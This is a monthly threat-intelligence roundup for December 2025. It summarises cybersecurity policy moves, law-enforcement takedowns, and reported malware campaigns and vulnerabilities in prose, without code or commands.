Cyware Monthly Threat Intelligence, December 2025
The Good
The UK, the U.S., and Portugal are taking major steps to boost cybersecurity. The UK’s NCSC launched a Cyber Essentials supply chain playbook to help businesses assess risks and monitor suppliers, addressing an area where only 14% currently excel. In the U.S., senators reintroduced the Health Care Cybersecurity and Resiliency Act of 2025, updating HIPAA with multifactor authentication, encryption, audits, and support for rural providers. Portugal now offers a legal safe harbor for good-faith security researchers, allowing them to identify vulnerabilities responsibly without fear of punishment, strengthening national digital security.
UK businesses are urged to integrate the Cyber Essentials (CE) scheme into their supply chains through a new playbook from the NCSC. This playbook outlines seven actionable steps to enhance cybersecurity, including assessing supply chain risks, defining security profiles for suppliers, and utilizing the Supplier Check tool to monitor compliance. Cybersecurity minister Liz Lloyd stressed the critical need for companies to address cyber risks within their supply chains, as only 14% of firms currently manage these risks effectively.
A bipartisan group of U.S. senators reintroduced the Health Care Cybersecurity and Resiliency Act of 2025 to strengthen healthcare cybersecurity. The bill proposes updates to HIPAA regulations, including multifactor authentication, encryption, audits, and minimum cybersecurity standards. Grants and training are suggested to offset regulatory burdens and improve cyber readiness, especially for rural healthcare providers. The legislation emphasizes the need for updated breach reporting mechanisms and guidance on corrective actions taken by regulators.
The National Defense Authorization Act (NDAA) for FY26 allocates substantial funding to enhance cybersecurity and artificial intelligence capabilities within U.S. defense and intelligence agencies. It designates $73 million for U.S. Cyber Command and mandates the harmonization of cybersecurity regulations across the Department of Defense by mid-2026. The bill also addresses foreign influence operations, particularly from Russia and China, directing agencies to bolster cybersecurity infrastructure in the Western Balkans. Key provisions include enhanced mobile phone security for senior officials and penetration testing for election systems.
Portugal has revised its cybercrime law to create a legal safe harbor for good-faith security researchers, exempting them from punishment under specific conditions. The new provision allows researchers to engage in activities previously considered illegal, such as unauthorized system access, as long as their intent is to identify vulnerabilities and enhance cybersecurity. Key conditions include the necessity of reporting discovered vulnerabilities to the system owner and the National Cybersecurity Center, ensuring actions do not disrupt services or harm systems. Researchers must not seek financial gain beyond standard compensation and must avoid using prohibited techniques like phishing or malware.
Law enforcement from Switzerland and Germany, aided by Europol and Eurojust, successfully dismantled the Cryptomixer cryptocurrency-mixing service, which had laundered over €1.3 billion in Bitcoin since its inception in 2016. During Operation Olympia, authorities seized three servers, more than 12 terabytes of data, the service's clear web and dark web domains, and €24 million ($27–29 million) in Bitcoin. Cryptomixer operated by pooling users’ cryptocurrency to obscure transaction origins, making it a favored tool for cybercriminals involved in various illegal activities such as drug trafficking and ransomware attacks. This takedown follows previous actions against similar services, including ChipMixer and Blender.io, highlighting ongoing efforts to combat cryptocurrency-related crime.
The DOJ dismantled a fraudulent website, tickmilleas[.]com, which impersonated the legitimate TickMill trading platform to defraud victims. This action is part of a broader initiative by the newly formed Scam Center Strike Force, targeting scam operations linked to the Tai Chang compound in Myanmar, run by the Democratic Karen Benevolent Army. Victims were misled into believing they were making legitimate investments, often shown false returns and deposits. The DOJ has identified multiple victims who lost money through this scheme, which is part of a larger trend of scams stealing approximately $10 billion annually from Americans. Collaborating with tech companies like Meta, law enforcement has also removed thousands of scam-related accounts to combat these illicit operations.
The Bad
Researchers warn of escalating cyber threats worldwide. The China-aligned APT LongNosedGoblin has been targeting Southeast Asian and Japanese government entities since 2023, using advanced malware like NosyHistorian and NosyDoor for data theft, lateral movement, and stealthy command execution. The YouTube Ghost Network exploits compromised accounts to spread malicious videos via GachiLoader and its Kidkadi payload, using novel PE injection and anti-analysis techniques. Meanwhile, Makop ransomware is aggressively targeting Indian organizations, leveraging weak RDP credentials, GuLoader, privilege escalation, and credential-dumping tools like Mimikatz to bypass defenses and deploy encryptors efficiently.
ESET researchers have identified LongNosedGoblin, a China-aligned APT group that conducts cyberespionage against governmental entities in Southeast Asia and Japan. Active since at least September 2023, the group employs a sophisticated toolset, including malware like NosyHistorian and NosyDoor, which utilize Group Policy for lateral movement and cloud services like Microsoft OneDrive for command and control. NosyHistorian collects browser history to identify potential targets, while NosyDoor functions as a backdoor, gathering metadata and executing commands remotely. The group has demonstrated advanced evasion techniques, such as bypassing security measures and masquerading as legitimate files.
The YouTube Ghost Network is a malware distribution campaign utilizing compromised accounts to promote malicious videos, primarily targeting users interested in game cheats and cracked software. A key component of this campaign is GachiLoader, a heavily obfuscated Node.js loader that deploys additional malware, including a second-stage payload known as Kidkadi. This loader employs a novel technique called Vectored Overloading for PE injection, allowing it to manipulate legitimate DLLs to load malicious payloads. The campaign has been active for over nine months, with more than 100 videos accumulating approximately 220,000 views. GachiLoader uses various anti-analysis techniques to evade detection, such as checking for virtual environments and executing PowerShell commands to gather system information.
A critical vulnerability in React2Shell (CVE-2025-55182) has been exploited by a ransomware gang to gain rapid access to corporate networks, deploying file-encrypting malware within a minute. This flaw, stemming from an insecure deserialization issue in the React Server Components' Flight protocol, allows remote code execution without authentication. Following its disclosure, both nation-state hackers and cybercriminals quickly leveraged React2Shell for various attacks, including cyberespionage and cryptocurrency mining. On December 5, a threat actor used this vulnerability to launch the Weaxor ransomware, a rebrand of the Mallox/FARGO operation, which targets public-facing servers. The attackers executed a series of commands to disable security measures and encrypt files, leaving ransom notes with payment instructions.
A sophisticated social engineering campaign is exploiting a fake “Word Online” extension error message to distribute DarkGate malware. This attack utilizes the ClickFix technique, where users are tricked into executing malicious commands disguised as legitimate troubleshooting steps. Upon encountering a fraudulent message, victims are prompted to click a “How to fix” button, which triggers a malicious JavaScript snippet. This script decodes a hidden PowerShell command that downloads an HTA file named “dark.hta” from a compromised site. Once executed, the HTA file establishes communication with the attacker’s infrastructure, allowing for the deployment of additional malware and the theft of sensitive data.
An active phishing campaign, codenamed Operation MoneyMount-ISO, is targeting the Russian finance sector by delivering Phantom Stealer malware through malicious ISO files. Phishing emails masquerade as legitimate financial communications, urging recipients to confirm bank transfers. These emails contain ZIP archives that include ISO files, which, when executed, mount as virtual drives and launch Phantom Stealer. This malware is designed to extract sensitive information, such as cryptocurrency wallet data, Discord tokens, and browser passwords. Additionally, the campaign has seen the use of another implant called DUPERUNNER, which loads the AdaptixC2 framework. The attackers employ various tactics to compromise finance, legal, and aerospace sectors in Russia, utilizing spear-phishing techniques and redirecting users to phishing pages hosted on IPFS and Vercel to steal credentials.
Makop ransomware, a variant of the Phobos family, has evolved by incorporating techniques like privilege escalation exploits and loader malware, specifically GuLoader, into its operations. Targeting primarily Indian organizations, attackers exploit weak RDP credentials to gain initial access, followed by network scanning, lateral movement, and disabling security measures. The use of off-the-shelf tools facilitates their low-effort yet effective approach, allowing them to navigate through networks and deploy encryptors. Credential dumping tools such as Mimikatz and LaZagne are employed to harvest sensitive information, while various local privilege escalation vulnerabilities enhance their control over compromised systems.
Microsoft released its Patch Tuesday updates, addressing 57 vulnerabilities, including three zero-day flaws - one actively exploited and two publicly disclosed. The actively exploited vulnerability, CVE-2025-62221, affects the Windows Cloud Files Mini Filter Driver, allowing attackers to elevate privileges to SYSTEM level. Publicly disclosed vulnerabilities include CVE-2025-64671, a remote code execution flaw in GitHub Copilot for Jetbrains, and CVE-2025-54100, a PowerShell vulnerability that could execute commands via the Invoke-WebRequest function. Additionally, the updates include critical fixes for remote code execution vulnerabilities in Microsoft Office and SharePoint, enhancing the security of various Microsoft products.
Over seven years, a malware campaign has infected 4.3 million browsers through malicious VS Code extensions, notably Bitcoin Black and Codo AI. These extensions, masquerading as a harmless theme and an AI coding assistant, execute scripts that capture screenshots, steal WiFi passwords, and hijack browser sessions. The attacker evolved their methods, initially using complex PowerShell scripts before transitioning to simpler batch scripts for payload delivery. Additionally, malicious Go and npm packages utilized typosquatting techniques to impersonate trusted libraries, while a Rust package acted as a loader for further malware. DLL hijacking techniques allow the malware to leverage the legitimate Lightshot executable, making detection difficult.
The Predator spyware, developed by Intellexa, uses “Aladdin,” a zero-click infection method, delivered via malicious ads that infect devices without user interaction. The ads are funneled through a network of advertising firms across multiple countries, exploiting public IP addresses to target victims. Additional delivery vectors, such as “Triton,” exploit Samsung Exynos devices, and other methods like “Thor” and “Oberon” are suspected to exist. Intellexa has been linked to numerous zero-day exploits and remains active despite sanctions and investigations.
The Chinese APT group "Silver Fox" uses false flags, such as Cyrillic characters, to impersonate Russian threat actors while targeting organizations in China through a Microsoft Teams SEO poisoning campaign. Silver Fox deploys ValleyRAT malware for espionage and financial fraud, enabling remote control of infected systems, data exfiltration, and long-term persistence. The campaign uses fake domains like "teamscn[.]com" to lure Chinese-speaking users into downloading malware disguised as Microsoft Teams software. The infection chain involves a trojanized Microsoft Teams executable, PowerShell commands to modify antivirus exclusions, and malicious DLL files loaded into legitimate Windows processes.
MuddyWater, an Iran-aligned cyberespionage group, has intensified its operations, primarily targeting critical infrastructure in Israel and Egypt. This latest campaign showcases the group's evolution, marked by the deployment of sophisticated custom malware, including the Fooder loader and the MuddyViper backdoor. Fooder cleverly disguises itself as the classic Snake game, employing delays to evade detection, while MuddyViper facilitates extensive data collection and credential theft. The group has refined its tactics, shifting from noisy, easily detectable methods to more stealthy approaches. Additionally, MuddyWater has demonstrated collaboration with the Lyceum group, indicating a strategic focus on government and military sectors.
A fake VSCode extension, "prettier-vscode-plus," impersonated the legitimate Prettier formatter and was used to initiate a supply-chain attack. The extension delivered a multi-stage malware chain, starting with the Anivia loader and ending with OctoRAT, a fully featured remote access toolkit. Both Anivia and OctoRAT used AES-encrypted payloads, in-memory execution, and process hollowing to evade detection. The malicious GitHub repository "vscode" was used to host VBScript payloads, with active payload rotation to avoid detection. The Anivia loader decrypted and executed payloads in memory, employing advanced techniques like process hollowing into legitimate Windows binaries. OctoRAT provided over 70 commands, including surveillance, file theft, privilege escalation, and cryptocurrency wallet theft.
Operation DupeHike is a cyber campaign targeting Russian corporate employees, particularly in HR and payroll sectors, using spear-phishing techniques. Attackers deploy malicious LNK files disguised as documents related to employee bonuses, which lead to the installation of the DUPERUNNER implant and the AdaptixC2 beacon. The infection begins with a ZIP file containing a decoy document that outlines internal HR policies, effectively luring victims. Upon execution, the LNK file utilizes PowerShell to download and run the DUPERUNNER implant, which performs various malicious activities, including process injection and data gathering. The AdaptixC2 beacon serves as a loader for further payloads, employing sophisticated techniques such as reflective loading and dynamic API resolution.
A malicious Rust package named evm-units has been discovered, capable of targeting Windows, macOS, and Linux systems while masquerading as an Ethereum Virtual Machine (EVM) helper tool. Uploaded to crates.io in April 2025, it garnered over 7,000 downloads before being removed. The malware checks for Qihoo 360 antivirus and executes OS-specific payloads to gain control of developer machines. On Linux, it downloads and runs a script, while on macOS, it uses osascript to execute a file. For Windows, it saves a PowerShell script in the temp directory and alters its execution based on the antivirus detection.
The Aisuru botnet has emerged as a significant threat, launching over 1,300 DDoS attacks in just three months, including a record peak of 29.7 Tbps. This botnet-for-hire service operates using millions of compromised routers and IoT devices worldwide, allowing cybercriminals to rent its capabilities for malicious purposes. The massive DDoS attacks have severely impacted various sectors, including gaming, telecommunications, and financial services, with the potential to disrupt internet service providers even when they are not direct targets. Notably, hyper-volumetric attacks have surged, with incidents exceeding 1Tbps more than doubling quarter-over-quarter.
A seven-year campaign by the group ShadyPanda has led to the infection of 4.3 million users of Google Chrome and Microsoft Edge through malicious browser extensions. Initially appearing legitimate, these extensions gained user trust before pushing updates that introduced spyware and backdoors. Five extensions, which infected 300,000 users, allowed for remote code execution, while another five remain active in the Edge marketplace, with one, WeTab, boasting three million installs. The malware enables comprehensive browser surveillance and data theft, sending sensitive information to servers in China. Earlier campaigns included extensions that tracked user behavior and monetized browsing data.
New Threats
Researchers have uncovered multiple new cyber threats. North Korea’s Lazarus Group is deploying a cross-platform BeaverTail malware variant to target cryptocurrency traders and financial institutions via trojanized npm packages and fake job sites. Kimsuky is spreading the DocSwap Android RAT through phishing sites, QR codes, and repackaged apps like BYCOM VPN to steal credentials, keystrokes, and files. Meanwhile, the GhostPoster campaign hides malicious JavaScript in Firefox extensions, affecting over 50,000 downloads, enabling backdoor access, affiliate hijacking, CAPTCHA bypass, and invisible iframe-based ad fraud.
A newly identified variant of the BeaverTail malware has been linked to North Korea's Lazarus Group, targeting cryptocurrency traders and financial institutions for espionage and financial gain. This JavaScript-based malware functions as both an information stealer and a loader, employing advanced obfuscation techniques such as layered Base64 and XOR encoding to conceal its activities. BeaverTail is distributed through various channels, including trojanized npm packages and fake job interview platforms, exploiting trust in development workflows. Since 2022, it has evolved into a modular, cross-platform framework capable of running on Windows, macOS, and Linux, featuring keylogging, screenshot capture, and clipboard monitoring.
Kimsuky, a North Korean threat actor, has launched a campaign distributing a new variant of Android malware called DocSwap through QR codes on phishing sites that mimic the South Korean logistics firm CJ Logistics. The attackers use smishing texts and phishing emails disguised as delivery notifications to trick victims into clicking on malicious URLs. Once redirected, users are prompted to scan a QR code to download a fake shipment tracking app, which appears legitimate but contains malware. This app decrypts an embedded APK and activates a RAT that allows attackers to log keystrokes, capture audio, and access files. Additionally, Kimsuky has repackaged legitimate applications, like the BYCOM VPN, injecting malicious functionalities. The campaign also includes phishing sites that resemble popular platforms like Naver and Kakao, aimed at harvesting user credentials.
A new botnet named Kimwolf has compromised approximately 1.8 million Android-based devices, including TVs and set-top boxes, launching extensive DDoS attacks. This botnet, linked to the notorious AISURU, has executed around 1.7 billion attack commands within a short span. Primarily targeting residential TV boxes, Kimwolf infections are prevalent in countries such as Brazil, India, and the U.S. The malware utilizes advanced techniques, including DNS-over-TLS and Ethereum Name Service (ENS) domains, to enhance its resilience against takedown efforts. Notably, over 96% of the commands issued by Kimwolf focus on exploiting compromised devices for proxy services, reflecting a shift in attackers' strategies towards monetizing IoT device bandwidth.
Cellik is a new Android MaaS being marketed on underground forums, allowing attackers to create trojanized versions of legitimate apps from the Google Play Store. This malware retains the original app's interface and functionality, making it difficult for users to detect infections. Cellik offers a variety of capabilities, including real-time screen capture, notification interception, file exfiltration, and encrypted communication with command-and-control servers. It features a hidden browser mode that utilizes the victim's stored cookies and can inject malicious code into trusted apps to steal credentials. The malware's integration with the Google Play Store enables cybercriminals to select and modify popular apps, potentially bypassing Google Play Protect's security measures.
A new campaign named GhostPoster has been discovered, which conceals malicious JavaScript within the logos of Firefox extensions, affecting over 50,000 downloads. This hidden code allows attackers to monitor browser activity and establish a backdoor for high-privilege access, enabling them to hijack affiliate links, inject tracking codes, and commit click and ad fraud. Koi Security researchers identified 17 compromised extensions that utilize steganography to extract and execute the malware loader. The loader typically activates after 48 hours, fetching payloads from hardcoded domains, but it remains dormant most of the time to evade detection. The final payload can hijack affiliate commissions, strip security headers, bypass CAPTCHA protections, and inject invisible iframes for ad fraud.
A new MaaS called SantaStealer is being promoted on Telegram and hacker forums, operating in memory to avoid detection. This malware is a rebranding of BluelineStealer and is offered in two subscription tiers: Basic for $175/month and Premium for $300/month. SantaStealer employs 14 data-collection modules, each running separately to steal information from browsers, cryptocurrency wallets, and messaging apps like Telegram and Discord. It exfiltrates stolen data in chunks to a hardcoded command-and-control endpoint. Despite claims of advanced evasion techniques, current samples have shown vulnerabilities and are easy to analyze, indicating poor operational security by the developers. The exact distribution methods for SantaStealer remain uncertain, but it may involve tactics like phishing and malicious software downloads.
A new campaign is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based RAT called PyStoreRAT. These repositories, disguised as development utilities or OSINT tools, contain minimal code that silently downloads and executes a remote HTA file. PyStoreRAT is a modular implant capable of executing various payloads, including an information stealer named Rhadamanthys. The malware is spread through loader stubs embedded in repositories that appear appealing to developers and analysts. The threat actors utilize social media for promotion and manipulate repository metrics to appear legitimate. Once executed, PyStoreRAT can profile systems, check for administrator privileges, and scan for cryptocurrency wallet files.
A newly discovered Android malware, dubbed DroidLock, can lock victims' screens for ransom while accessing sensitive data such as text messages, call logs, and contacts. This malware targets Spanish-speaking users and spreads through malicious websites that promote fake applications. Once installed, DroidLock requests Device Admin and Accessibility Services permissions, allowing it to perform various malicious actions, including changing PINs and wiping devices. The ransomware uses an overlay to demand payment from victims, threatening to destroy files if the ransom is not paid within 24 hours. Additionally, it can steal device lock patterns, enabling remote access through a VNC sharing system.
React2Shell is being heavily exploited by threat actors leveraging a critical vulnerability in React Server Components (CVE-2025-55182), enabling unauthenticated remote code execution. Attackers are deploying various malware, including cryptocurrency miners like XMRig and backdoors such as PeerBlight, across multiple sectors, particularly construction and entertainment. Automated tools are used to exploit vulnerable Next.js instances, with notable payloads including CowTunnel, a reverse proxy, and ZinFoq, a post-exploitation framework that disguises itself as legitimate Linux services. As of December 8, 2025, over 165,000 IP addresses and 644,000 domains were identified as vulnerable, with significant impacts observed in the U.S. and Germany. This exploitation has also been linked to various malware campaigns affecting more than 50 organizations globally.
A newly discovered vulnerability in the .NET Framework, known as SOAPwn, allows attackers to achieve remote code execution and arbitrary file writes in enterprise applications. This flaw arises from improper handling of Web Services Description Language (WSDL) imports and HTTP client proxies, particularly when SOAP clients are dynamically created from attacker-controlled WSDLs. By exploiting this vulnerability, threat actors can manipulate .NET Framework HTTP client proxies to write files to the file system, potentially overwriting existing files. Additionally, attackers can leverage this flaw to capture NTLM challenges, facilitating further exploitation. Despite responsible disclosures to Microsoft, the company has chosen not to address the issue, attributing it to application behavior. Some affected vendors, such as Barracuda and Ivanti, have released patches, while the vulnerability in Umbraco 8 remains unaddressed due to its end-of-life status.
Four distinct threat clusters have emerged utilizing the CastleLoader malware, indicating its distribution under a MaaS model by the actor known as GrayBravo. This group, previously identified as TAG-150, exhibits rapid development cycles and technical sophistication. Notable tools in their arsenal include CastleRAT and CastleBot, which facilitate the delivery of various malware families such as DeerStealer and RedLine Stealer. The clusters employ diverse tactics, including phishing campaigns targeting the logistics sector and impersonation of legitimate brands like Booking[.]com. GrayBravo has established a multi-tiered infrastructure, leveraging compromised accounts on freight-matching platforms to enhance the credibility of its phishing efforts.
Google has released a security update for Chrome to address a high-severity zero-day vulnerability that is actively being exploited. This vulnerability, which currently lacks a CVE identifier, is tracked under bug tracker ID 466192044 and may involve memory corruption issues within the V8 JavaScript engine. The nature of the exploit suggests it could enable sandbox escapes and remote code execution, raising concerns about targeted attacks, particularly from government-sponsored espionage campaigns. Alongside the zero-day fix, the update also addresses two medium-severity vulnerabilities related to the browser’s password manager and toolbar component.
MuddyWater, an Iranian hacking group, has been observed deploying a new backdoor known as UDPGangster, utilizing the User Datagram Protocol (UDP) for C2 operations. This cyberespionage campaign targets users in Turkey, Israel, and Azerbaijan through spear-phishing tactics that involve sending booby-trapped Microsoft Word documents. These documents, disguised as invitations to a seminar from the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs, prompt users to enable macros, which execute embedded malicious code. The UDPGangster payload establishes persistence by modifying the Windows Registry and incorporates extensive anti-analysis checks to evade detection. Once operational, it gathers system information and connects to an external server over UDP to exfiltrate data, execute commands, and deploy additional payloads.
FvncBot, a new Android banking trojan, has been targeting Polish users, disguised as a security app developed by mBank. The malware payload includes features like keylogging, web-inject attacks, screen streaming, and hidden virtual network computing (HVNC) for financial fraud. FvncBot’s code is entirely new and not derived from other Android trojans like Ermac or Hook. The malware uses Android’s accessibility services to capture sensitive user data, including passwords and one-time passwords (OTPs). It implements advanced H.264 video compression for low-latency screen streaming, which is more efficient than traditional JPEG streaming.
A new strain of CoinMiner malware is spreading via USB drives in South Korea, targeting workstations for Monero cryptocurrency mining. The infection process involves a malicious shortcut file (.lnk) that executes scripts to load malware using DLL Side-Loading techniques. The malware creates deceptive directories and employs trusted Windows components to bypass antivirus detection. The payload, PrintMiner, maximizes mining efficiency while employing stealth tactics like bypassing Windows Defender and pausing activity during high-resource tasks.
A high-severity vulnerability (CVE-2025-66476) has been discovered in Vim for Windows, allowing attackers to execute arbitrary code through an uncontrolled search path issue. The flaw, rated with a CVSS score of 7.8, affects versions earlier than 9.1.1947. It enables attackers to plant malicious executables in directories, which Vim may execute instead of legitimate system binaries. The vulnerability can be exploited without administrative privileges, posing a significant threat to users. The issue has been resolved in version 9.1.1947, and users are urged to update immediately.
Three critical vulnerabilities were discovered in Picklescan, a security scanner for Python pickle files, allowing malicious actors to execute arbitrary code by bypassing its detection mechanisms. The vulnerabilities (CVE-2025-10155, CVE-2025-10156, CVE-2025-10157) include file extension bypass, CRC error exploitation, and unsafe globals check circumvention, enabling attackers to execute malicious code and potentially launch supply chain attacks. A separate vulnerability (CVE-2025-46417) was found, allowing malicious pickle files to exfiltrate sensitive information via DNS, exploiting legitimate Python modules like linecache and ssl.
The Glassworm malware has resurfaced in its third wave, introducing 24 new malicious packages on the OpenVSX and Microsoft Visual Studio marketplaces. Initially detected in October, Glassworm employs invisible Unicode characters to conceal its code and targets developers by stealing credentials from GitHub, npm, and OpenVSX accounts, as well as cryptocurrency wallet data. It also establishes a SOCKS proxy for routing malicious traffic and installs an HVNC client for remote access. Despite previous containment efforts, the malware returned with new extensions and publisher accounts, targeting popular frameworks like Flutter and React Native. The latest wave demonstrates an evolution in its technical capabilities, now utilizing Rust-based implants while continuing to manipulate download counts to appear trustworthy and confuse users in search results.
A critical vulnerability, tracked as CVE-2025-64775, has been discovered in Apache Struts, a popular open-source web application framework. This flaw enables attackers to exploit improper cleanup of temporary files during multipart requests, potentially leading to disk exhaustion attacks. By generating numerous large temporary files, an attacker can fill a server’s disk space, causing significant disruptions such as slow performance or complete unavailability of the application. The vulnerability affects several versions of Struts, including those that are no longer supported.
A new Android malware named Albiriox has emerged, operating under a MaaS model to facilitate on-device fraud and screen manipulation across over 400 applications, including banking and cryptocurrency platforms. Distributed through social engineering tactics, Albiriox employs dropper applications and advanced packing techniques to evade detection. It uses accessibility services to bypass Android's security measures, enabling attackers to conduct credential theft and manipulate device screens without raising alarms. Additionally, it executes overlay attacks and utilizes fake websites to lure victims into downloading malicious APKs.
Operation Hanoi Thief is a sophisticated cyber-espionage campaign targeting Vietnam's technology and recruitment sectors. It employs spear-phishing tactics through a malicious email containing a ZIP file disguised as a job applicant's CV. This ZIP file includes a pseudo-polyglot payload—a combination of an image, a PDF document, and a malicious script—designed to deceive victims. When the LNK file is executed, it triggers a legitimate Windows tool, ftp.exe, to run hidden commands, ultimately extracting a Base64 encoded blob that decodes into the LOTUSHARVEST malware. This information stealer targets browser data from Google Chrome and Microsoft Edge, exfiltrating sensitive information to attacker-controlled domains.